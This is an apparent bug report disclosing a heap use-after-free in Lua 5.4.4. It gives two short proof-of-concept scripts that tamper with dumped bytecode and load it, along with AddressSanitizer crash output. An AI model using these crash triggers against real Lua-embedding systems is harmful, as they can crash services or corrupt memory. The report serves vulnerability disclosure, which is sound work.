Hi,
A heap use after free is detected in lua (version 5.4.4, git commit: 5d708c3f9cae12820e415d4f89c9eacbe2ab964b. The release version 5.4.4 is also affected.)
poc.lua:
---
maybe = string.dump(function() return ({[tr_e]=true})[true] end)
maybe = maybe:gsub('\1\1',']1\2')
maybe = load(maybe)()
---
When building with -fsanitize=address and execute "./lua poc.lua", we have the following crash info:
---
=================================================================
==3588130==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000006d8 at pc 0x5555556d08fa bp 0x7fffffffd490 sp 0x7fffffffd488
READ of size 1 at 0x6170000006d8 thread T0
#0 0x5555556d08f9 in luaV_execute lua_fuzz/lua/lvm.c:1326:13
#1 0x5555556739f5 in ccall lua/ldo.c:641:5
#2 0x5555556739f5 in luaD_callnoyield lua/ldo.c:659:3
#3 0x55555566e68c in luaD_rawrunprotected lua/ldo.c:144:3
#4 0x5555556753f4 in luaD_pcall lua/ldo.c:957:12
#5 0x55555565e6da in lua_pcallk lua/lapi.c:1064:14
#6 0x55555564fdc3 in docall lua/lua.c:160:12
#7 0x55555564ef32 in handle_script lua/lua.c:256:14
#8 0x55555564ef32 in pmain lua/lua.c:645:9
---
Without asan it prints the following:
---
./lua/lua: ./poc.lua:1: table index is nil
stack traceback:
./poc.lua:1: in function <./poc.lua:1>
./poc.lua:3: in main chunk
[C]: in ?
---
A variant poc can trigger a crash in default build without asan:
---
ma0be=string.dump(
function()
return({[e]=true})[true]end)
ma0be=ma0be:gsub('\1\1','')
m=load(ma0be)((0)and 0)
---
--
Best Wishes,
Yongheng Chen